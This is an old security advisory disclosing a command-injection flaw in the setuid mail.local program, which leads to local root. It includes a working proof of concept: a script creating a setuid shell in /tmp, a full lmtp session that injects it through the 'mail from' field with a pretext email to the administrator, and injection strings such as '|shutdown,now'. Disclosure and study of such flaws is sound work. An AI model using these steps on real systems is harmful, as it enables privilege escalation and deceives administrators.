[ SOURCE: http://www.secureroot.com/security/advisories/9735785296.html ] hi, mail.local is a little setuid root prog designed, like its name suggest, for local mail delivering. Used with the -l option, we have an interactive mode in lmtp protocol ( simplified smtp for local mail delivery only ) A weakness exists in the 'mail from' field that allow any local user to insert a piped shell command that may be executed by the recipient when he does a reply with the mail command. A little social engineering skill should help to root the boxe. Finally, mail.local shouldn't allow such escape chars even in the mail from field and the command mail shouldn't allow such a reply through a pipe. A space char in the command will finish the string, so either u use a single command like '|reboot' or use a comma that should be converted in space by mail. eg: '|shutdown,now' Linux 2.4.0 beta Caldera that was freely distributed during the defcon 00 is vulnerable to this pb. That looks like the old sendmail bugs nostalgia ======= #cat exploit #!/bin/sh cp /bin/sh /tmp/newsh chmod a+rws /tmp/newsh #id #id=666(c3rb3r) gid=100(user) # #cp exploit /tmp/@hotmail.com #chmod a+x /tmp/@hotmail.com #mail.local -l .... mail from:<|/tmp/@hotmail.com> U can use many senders to hide the evil string rcpt to: data Subject:I have a problem I need higher priviledge on this machine, can u do something for me please ? thanx. c3rb3r . quit ..... (now wait for a reply and then, ) #ls /tmp @hotmail.com newsh #/tmp/newsh #id #id=0(root) gid=0(root) #echo 'very nice, thanx a lot' | mail -s 'thanx' root // With thankfully Have a nice day, Gregory Duchemin Security consultant 1001 bd Maisonneuve Ouest, suite 200 Montreal (Quebec) H3A 3C8 CANADA c3rb3r@hotmail.com _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. Share information about yourself, create your own public profile at http://profiles.msn.com.